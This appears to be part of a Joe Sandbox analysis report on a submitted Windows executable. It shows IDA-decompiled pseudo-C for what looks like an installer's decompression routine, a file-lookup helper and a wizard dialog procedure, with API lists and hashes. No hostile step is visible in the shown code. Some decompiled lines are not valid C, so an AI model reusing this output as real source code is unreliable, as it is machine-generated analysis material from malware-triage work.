                            								 *(__ebp - 0x88) = 0xc;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t334 = __ebp - 0x70;
                            							 *_t334 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t334;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							__eax =  *(__ebp - 0x2c);
                            							goto L101;
                            						case 0xd:
                            							goto L36;
                            						case 0xe:
                            							goto L45;
                            						case 0xf:
                            							goto L57;
                            						case 0x10:
                            							L109:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0x10;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t365 = __ebp - 0x70;
                            							 *_t365 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t365;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							goto L111;
                            						case 0x11:
                            							L68:
                            							__esi =  *(__ebp - 0x58);
                            							 *(__ebp - 0x84) = 0x12;
                            							goto L132;
                            						case 0x12:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__eax =  *(__ebp - 0x58);
                            								 *(__ebp - 0x84) = 0x13;
                            								__esi =  *(__ebp - 0x58) + 2;
                            								goto L132;
                            							}
                            							__eax =  *(__ebp - 0x4c);
                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                            							__ecx =  *(__ebp - 0x58);
                            							__eax =  *(__ebp - 0x4c) << 4;
                            							__eflags = __eax;
                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                            							goto L130;
                            						case 0x13:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								_t469 = __ebp - 0x58;
                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                            								__eflags =  *_t469;
                            								 *(__ebp - 0x30) = 0x10;
                            								 *(__ebp - 0x40) = 8;
                            								L144:
                            								 *(__ebp - 0x7c) = 0x14;
                            								goto L145;
                            							}
                            							__eax =  *(__ebp - 0x4c);
                            							__ecx =  *(__ebp - 0x58);
                            							__eax =  *(__ebp - 0x4c) << 4;
                            							 *(__ebp - 0x30) = 8;
                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                            							L130:
                            							 *(__ebp - 0x58) = __eax;
                            							 *(__ebp - 0x40) = 3;
                            							goto L144;
                            						case 0x14:
                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                            							__eax =  *(__ebp - 0x80);
                            							goto L140;
                            						case 0x15:
                            							__eax = 0;
                            							__eflags =  *(__ebp - 0x38) - 7;
                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            							__al = __al & 0x000000fd;
                            							__eax = (__eflags >= 0) - 1 + 0xb;
                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                            							goto L120;
                            						case 0x16:
                            							__eax =  *(__ebp - 0x30);
                            							__eflags = __eax - 4;
                            							if(__eax >= 4) {
                            								_push(3);
                            								_pop(__eax);
                            							}
                            							__ecx =  *(__ebp - 4);
                            							 *(__ebp - 0x40) = 6;
                            							__eax = __eax << 7;
                            							 *(__ebp - 0x7c) = 0x19;
                            							 *(__ebp - 0x58) = __eax;
                            							goto L145;
                            						case 0x17:
                            							L145:
                            							__eax =  *(__ebp - 0x40);
                            							 *(__ebp - 0x50) = 1;
                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                            							goto L149;
                            						case 0x18:
                            							L146:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0x18;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t484 = __ebp - 0x70;
                            							 *_t484 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t484;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							L148:
                            							_t487 = __ebp - 0x48;
                            							 *_t487 =  *(__ebp - 0x48) - 1;
                            							__eflags =  *_t487;
                            							L149:
                            							__eflags =  *(__ebp - 0x48);
                            							if( *(__ebp - 0x48) <= 0) {
                            								__ecx =  *(__ebp - 0x40);
                            								__ebx =  *(__ebp - 0x50);
                            								0 = 1;
                            								__eax = 1 << __cl;
                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                            								__eax =  *(__ebp - 0x7c);
                            								 *(__ebp - 0x44) = __ebx;
                            								goto L140;
                            							}
                            							__eax =  *(__ebp - 0x50);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            							__eax =  *(__ebp - 0x58);
                            							__esi = __edx + __eax;
                            							 *(__ebp - 0x54) = __esi;
                            							__ax =  *__esi;
                            							__edi = __ax & 0x0000ffff;
                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            							__eflags =  *(__ebp - 0xc) - __ecx;
                            							if( *(__ebp - 0xc) >= __ecx) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            								__cx = __ax;
                            								__cx = __ax >> 5;
                            								__eax = __eax - __ecx;
                            								__edx = __edx + 1;
                            								__eflags = __edx;
                            								 *__esi = __ax;
                            								 *(__ebp - 0x50) = __edx;
                            							} else {
                            								 *(__ebp - 0x10) = __ecx;
                            								0x800 = 0x800 - __edi;
                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            								 *__esi = __cx;
                            							}
                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                            							if( *(__ebp - 0x10) >= 0x1000000) {
                            								goto L148;
                            							} else {
                            								goto L146;
                            							}
                            						case 0x19:
                            							__eflags = __ebx - 4;
                            							if(__ebx < 4) {
                            								 *(__ebp - 0x2c) = __ebx;
                            								L119:
                            								_t393 = __ebp - 0x2c;
                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                            								__eflags =  *_t393;
                            								L120:
                            								__eax =  *(__ebp - 0x2c);
                            								__eflags = __eax;
                            								if(__eax == 0) {
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                            									goto L170;
                            								}
                            								__eflags = __eax -  *(__ebp - 0x60);
                            								if(__eax >  *(__ebp - 0x60)) {
                            									goto L171;
                            								}
                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                            								__eax =  *(__ebp - 0x30);
                            								_t400 = __ebp - 0x60;
                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                            								__eflags =  *_t400;
                            								goto L123;
                            							}
                            							__ecx = __ebx;
                            							__eax = __ebx;
                            							__ecx = __ebx >> 1;
                            							__eax = __ebx & 0x00000001;
                            							__ecx = (__ebx >> 1) - 1;
                            							__al = __al | 0x00000002;
                            							__eax = (__ebx & 0x00000001) << __cl;
                            							__eflags = __ebx - 0xe;
                            							 *(__ebp - 0x2c) = __eax;
                            							if(__ebx >= 0xe) {
                            								__ebx = 0;
                            								 *(__ebp - 0x48) = __ecx;
                            								L102:
                            								__eflags =  *(__ebp - 0x48);
                            								if( *(__ebp - 0x48) <= 0) {
                            									__eax = __eax + __ebx;
                            									 *(__ebp - 0x40) = 4;
                            									 *(__ebp - 0x2c) = __eax;
                            									__eax =  *(__ebp - 4);
                            									__eax =  *(__ebp - 4) + 0x644;
                            									__eflags = __eax;
                            									L108:
                            									__ebx = 0;
                            									 *(__ebp - 0x58) = __eax;
                            									 *(__ebp - 0x50) = 1;
                            									 *(__ebp - 0x44) = 0;
                            									 *(__ebp - 0x48) = 0;
                            									L112:
                            									__eax =  *(__ebp - 0x40);
                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                            										_t391 = __ebp - 0x2c;
                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                            										__eflags =  *_t391;
                            										goto L119;
                            									}
                            									__eax =  *(__ebp - 0x50);
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            									__eax =  *(__ebp - 0x58);
                            									__esi = __edi + __eax;
                            									 *(__ebp - 0x54) = __esi;
                            									__ax =  *__esi;
                            									__ecx = __ax & 0x0000ffff;
                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                            									__eflags =  *(__ebp - 0xc) - __edx;
                            									if( *(__ebp - 0xc) >= __edx) {
                            										__ecx = 0;
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                            										__ecx = 1;
                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                            										__ebx = 1;
                            										__ecx =  *(__ebp - 0x48);
                            										__ebx = 1 << __cl;
                            										__ecx = 1 << __cl;
                            										__ebx =  *(__ebp - 0x44);
                            										__ebx =  *(__ebp - 0x44) | __ecx;
                            										__cx = __ax;
                            										__cx = __ax >> 5;
                            										__eax = __eax - __ecx;
                            										__edi = __edi + 1;
                            										__eflags = __edi;
                            										 *(__ebp - 0x44) = __ebx;
                            										 *__esi = __ax;
                            										 *(__ebp - 0x50) = __edi;
                            									} else {
                            										 *(__ebp - 0x10) = __edx;
                            										0x800 = 0x800 - __ecx;
                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            										 *__esi = __dx;
                            									}
                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                            									if( *(__ebp - 0x10) >= 0x1000000) {
                            										L111:
                            										_t368 = __ebp - 0x48;
                            										 *_t368 =  *(__ebp - 0x48) + 1;
                            										__eflags =  *_t368;
                            										goto L112;
                            									} else {
                            										goto L109;
                            									}
                            								}
                            								__ecx =  *(__ebp - 0xc);
                            								__ebx = __ebx + __ebx;
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            								 *(__ebp - 0x44) = __ebx;
                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                            									__ecx =  *(__ebp - 0x10);
                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            									__ebx = __ebx | 0x00000001;
                            									__eflags = __ebx;
                            									 *(__ebp - 0x44) = __ebx;
                            								}
                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                            								if( *(__ebp - 0x10) >= 0x1000000) {
                            									L101:
                            									_t338 = __ebp - 0x48;
                            									 *_t338 =  *(__ebp - 0x48) - 1;
                            									__eflags =  *_t338;
                            									goto L102;
                            								} else {
                            									goto L99;
                            								}
                            							}
                            							__edx =  *(__ebp - 4);
                            							__eax = __eax - __ebx;
                            							 *(__ebp - 0x40) = __ecx;
                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                            							goto L108;
                            						case 0x1a:
                            							goto L55;
                            						case 0x1b:
                            							L75:
                            							__eflags =  *(__ebp - 0x64);
                            							if( *(__ebp - 0x64) == 0) {
                            								 *(__ebp - 0x88) = 0x1b;
                            								goto L170;
                            							}
                            							__eax =  *(__ebp - 0x14);
                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            							__eflags = __eax -  *(__ebp - 0x74);
                            							if(__eax >=  *(__ebp - 0x74)) {
                            								__eax = __eax +  *(__ebp - 0x74);
                            								__eflags = __eax;
                            							}
                            							__edx =  *(__ebp - 8);
                            							__cl =  *(__eax + __edx);
                            							__eax =  *(__ebp - 0x14);
                            							 *(__ebp - 0x5c) = __cl;
                            							 *(__eax + __edx) = __cl;
                            							__eax = __eax + 1;
                            							__edx = 0;
                            							_t274 = __eax %  *(__ebp - 0x74);
                            							__eax = __eax /  *(__ebp - 0x74);
                            							__edx = _t274;
                            							__eax =  *(__ebp - 0x68);
                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            							_t283 = __ebp - 0x64;
                            							 *_t283 =  *(__ebp - 0x64) - 1;
                            							__eflags =  *_t283;
                            							 *( *(__ebp - 0x68)) = __cl;
                            							goto L79;
                            						case 0x1c:
                            							while(1) {
                            								L123:
                            								__eflags =  *(__ebp - 0x64);
                            								if( *(__ebp - 0x64) == 0) {
                            									break;
                            								}
                            								__eax =  *(__ebp - 0x14);
                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            								__eflags = __eax -  *(__ebp - 0x74);
                            								if(__eax >=  *(__ebp - 0x74)) {
                            									__eax = __eax +  *(__ebp - 0x74);
                            									__eflags = __eax;
                            								}
                            								__edx =  *(__ebp - 8);
                            								__cl =  *(__eax + __edx);
                            								__eax =  *(__ebp - 0x14);
                            								 *(__ebp - 0x5c) = __cl;
                            								 *(__eax + __edx) = __cl;
                            								__eax = __eax + 1;
                            								__edx = 0;
                            								_t414 = __eax %  *(__ebp - 0x74);
                            								__eax = __eax /  *(__ebp - 0x74);
                            								__edx = _t414;
                            								__eax =  *(__ebp - 0x68);
                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            								__eflags =  *(__ebp - 0x30);
                            								 *( *(__ebp - 0x68)) = __cl;
                            								 *(__ebp - 0x14) = __edx;
                            								if( *(__ebp - 0x30) > 0) {
                            									continue;
                            								} else {
                            									goto L80;
                            								}
                            							}
                            							 *(__ebp - 0x88) = 0x1c;
                            							goto L170;
                            					}
                            				}
                            			}














                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040699E(WCHAR* _a4) {
                            				void* _t2;
                            
                            				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                            				if(_t2 == 0xffffffff) {
                            					return 0;
                            				}
                            				FindClose(_t2);
                            				return 0x426798;
                            			}





                            APIs
                            • FindFirstFileW.KERNELBASE(766DFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004069A9
                            • FindClose.KERNEL32(00000000), ref: 004069B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (legend: Executed / Not Executed; graph rendering not preserved)
                            C-Code - Quality: 84%
                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                            				struct HWND__* _v28;
                            				void* _v84;
                            				void* _v88;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t34;
                            				signed int _t36;
                            				signed int _t38;
                            				struct HWND__* _t48;
                            				signed int _t67;
                            				struct HWND__* _t73;
                            				signed int _t86;
                            				struct HWND__* _t91;
                            				signed int _t99;
                            				int _t103;
                            				signed int _t117;
                            				int _t118;
                            				int _t122;
                            				signed int _t124;
                            				struct HWND__* _t127;
                            				struct HWND__* _t128;
                            				int _t129;
                            				intOrPtr _t130;
                            				long _t133;
                            				int _t135;
                            				int _t136;
                            				void* _t137;
                            				void* _t145;
                            
                            				_t130 = _a8;
                            				if(_t130 == 0x110 || _t130 == 0x408) {
                            					_t34 = _a12;
                            					_t127 = _a4;
                            					__eflags = _t130 - 0x110;
                            					 *0x423730 = _t34;
                            					if(_t130 == 0x110) {
                            						 *0x42a268 = _t127;
                            						 *0x423744 = GetDlgItem(_t127, 1);
                            						_t91 = GetDlgItem(_t127, 2);
                            						_push(0xffffffff);
                            						_push(0x1c);
                            						 *0x421710 = _t91;
                            						E004045C4(_t127);
                            						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                            						 *0x42922c = E0040140B(4);
                            						_t34 = 1;
                            						__eflags = 1;
                            						 *0x423730 = 1;
                            					}
                            					_t124 =  *0x40a39c; // 0x0
                            					_t136 = 0;
                            					_t133 = (_t124 << 6) +  *0x42a280;
                            					__eflags = _t124;
                            					if(_t124 < 0) {
                            						L36:
                            						E00404610(0x40b);
                            						while(1) {
                            							_t36 =  *0x423730;
                            							 *0x40a39c =  *0x40a39c + _t36;
                            							_t133 = _t133 + (_t36 << 6);
                            							_t38 =  *0x40a39c; // 0x0
                            							__eflags = _t38 -  *0x42a284;
                            							if(_t38 ==  *0x42a284) {
                            								E0040140B(1);
                            							}
                            							__eflags =  *0x42922c - _t136;
                            							if( *0x42922c != _t136) {
                            								break;
                            							}
                            							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                            							if(__eflags >= 0) {
                            								break;
                            							}
                            							_t117 =  *(_t133 + 0x14);
                            							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                            							_push(0xfffffc19);
                            							E004045C4(_t127);
                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                            							_push(0xfffffc1b);
                            							E004045C4(_t127);
                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                            							_push(0xfffffc1a);
                            							E004045C4(_t127);
                            							_t48 = GetDlgItem(_t127, 3);
                            							__eflags =  *0x42a2ec - _t136;
                            							_v28 = _t48;
                            							if( *0x42a2ec != _t136) {
                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                            								__eflags = _t117;
                            							}
                            							ShowWindow(_t48, _t117 & 0x00000008);
                            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                            							E004045E6(_t117 & 0x00000002);
                            							_t118 = _t117 & 0x00000004;
                            							EnableWindow( *0x421710, _t118);
                            							__eflags = _t118 - _t136;
                            							if(_t118 == _t136) {
                            								_push(1);
                            							} else {
                            								_push(_t136);
                            							}
                            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                            							__eflags =  *0x42a2ec - _t136;
                            							if( *0x42a2ec == _t136) {
                            								_push( *0x423744);
                            							} else {
                            								SendMessageW(_t127, 0x401, 2, _t136);
                            								_push( *0x421710);
                            							}
                            							E004045F9();
                            							E00406668(0x423748, E004040A6());
                            							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                            							SetWindowTextW(_t127, 0x423748);
                            							_push(_t136);
                            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                            							__eflags = _t67;
                            							if(_t67 != 0) {
                            								continue;
                            							} else {
                            								__eflags =  *_t133 - _t136;
                            								if( *_t133 == _t136) {
                            									continue;
                            								}
                            								__eflags =  *(_t133 + 4) - 5;
                            								if( *(_t133 + 4) != 5) {
                            									DestroyWindow( *0x429238);
                            									 *0x422720 = _t133;
                            									__eflags =  *_t133 - _t136;
                            									if( *_t133 <= _t136) {
                            										goto L60;
                            									}
                            									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                            									__eflags = _t73 - _t136;
                            									 *0x429238 = _t73;
                            									if(_t73 == _t136) {
                            										goto L60;
                            									}
                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                            									_push(6);
                            									E004045C4(_t73);
                            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                            									ScreenToClient(_t127, _t137 + 0x10);
                            									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                            									_push(_t136);
                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                            									__eflags =  *0x42922c - _t136;
                            									if( *0x42922c != _t136) {
                            										goto L63;
                            									}
                            									ShowWindow( *0x429238, 8);
                            									E00404610(0x405);
                            									goto L60;
                            								}
                            								__eflags =  *0x42a2ec - _t136;
                            								if( *0x42a2ec != _t136) {
                            									goto L63;
                            								}
                            								__eflags =  *0x42a2e0 - _t136;
                            								if( *0x42a2e0 != _t136) {
                            									continue;
                            								}
                            								goto L63;
                            							}
                            						}
                            						DestroyWindow( *0x429238); // executed
                            						 *0x42a268 = _t136;
                            						EndDialog(_t127,  *0x421f18);
                            						goto L60;
                            					} else {
                            						__eflags = _t34 - 1;
                            						if(_t34 != 1) {
                            							L35:
                            							__eflags =  *_t133 - _t136;
                            							if( *_t133 == _t136) {
                            								goto L63;
                            							}
                            							goto L36;
                            						}
                            						_push(0);
                            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                            						__eflags = _t86;
                            						if(_t86 == 0) {
                            							goto L35;
                            						}
                            						SendMessageW( *0x429238, 0x40f, 0, 1);
                            						__eflags =  *0x42922c;
                            						return 0 |  *0x42922c == 0x00000000;
                            					}
                            				} else {
                            					_t127 = _a4;
                            					_t136 = 0;
                            					if(_t130 == 0x47) {
                            						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                            					}
                            					_t122 = _a12;
                            					if(_t130 != 5) {
                            						L8:
                            						if(_t130 != 0x40d) {
                            							__eflags = _t130 - 0x11;
                            							if(_t130 != 0x11) {
                            								__eflags = _t130 - 0x111;
                            								if(_t130 != 0x111) {
                            									goto L28;
                            								}
                            								_t135 = _t122 & 0x0000ffff;
                            								_t128 = GetDlgItem(_t127, _t135);
                            								__eflags = _t128 - _t136;
                            								if(_t128 == _t136) {
                            									L15:
                            									__eflags = _t135 - 1;
                            									if(_t135 != 1) {
                            										__eflags = _t135 - 3;
                            										if(_t135 != 3) {
                            											_t129 = 2;
                            											__eflags = _t135 - _t129;
                            											if(_t135 != _t129) {
                            												L27:
                            												SendMessageW( *0x429238, 0x111, _t122, _a16);
                            												goto L28;
                            											}
                            											__eflags =  *0x42a2ec - _t136;
                            											if( *0x42a2ec == _t136) {
                            												_t99 = E0040140B(3);
                            												__eflags = _t99;
                            												if(_t99 != 0) {
                            													goto L28;
                            												}
                            												 *0x421f18 = 1;
                            												L23:
                            												_push(0x78);
                            												L24:
                            												E0040459D();
                            												goto L28;
                            											}
                            											E0040140B(_t129);
                            											 *0x421f18 = _t129;
                            											goto L23;
                            										}
                            										__eflags =  *0x40a39c - _t136; // 0x0
                            										if(__eflags <= 0) {
                            											goto L27;
                            										}
                            										_push(0xffffffff);
                            										goto L24;
                            									}
                            									_push(_t135);
                            									goto L24;
                            								}
                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                            								_t103 = IsWindowEnabled(_t128);
                            								__eflags = _t103;
                            								if(_t103 == 0) {
                            									L63:
                            									return 0;
                            								}
                            								goto L15;
                            							}
                            							SetWindowLongW(_t127, _t136, _t136);
                            							return 1;
                            						}
                            						DestroyWindow( *0x429238);
                            						 *0x429238 = _t122;
                            						L60:
                            						_t145 =  *0x425748 - _t136; // 0x0
                            						if(_t145 == 0 &&  *0x429238 != _t136) {
                            							ShowWindow(_t127, 0xa);
                            							 *0x425748 = 1;
                            						}
                            						goto L63;
                            					} else {
                            						asm("sbb eax, eax");
                            						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                            							L28:
                            							return E0040462B(_a8, _t122, _a16);
                            						} else {
                            							ShowWindow(_t127, 4);
                            							goto L8;
                            						}
                            					}
                            				}
                            			}
































                            0x00404591
                            0x00000000
                            0x004041bb
                            0x00404179
                            0x00000000
                            0x00404181
                            0x00404160
                            0x00404166
                            0x0040456e
                            0x0040456e
                            0x00404574
                            0x00404581
                            0x00404587
                            0x00404587
                            0x00000000
                            0x00404110
                            0x00404115
                            0x00404121
                            0x0040412a
                            0x0040422b
                            0x00000000
                            0x00404149
                            0x0040414c
                            0x00000000
                            0x0040414c
                            0x0040412a
                            0x0040410e

                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                            • ShowWindow.USER32(?), ref: 00404121
                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                            • DestroyWindow.USER32 ref: 00404160
                            • SetWindowLongW.USER32 ref: 00404179
                            • GetDlgItem.USER32 ref: 00404198
                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                            • GetDlgItem.USER32 ref: 0040425E
                            • GetDlgItem.USER32 ref: 00404268
                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                            • GetDlgItem.USER32 ref: 00404379
                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                            • EnableWindow.USER32(?,?), ref: 004043AC
                            • EnableWindow.USER32(?,?), ref: 004043C7
                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
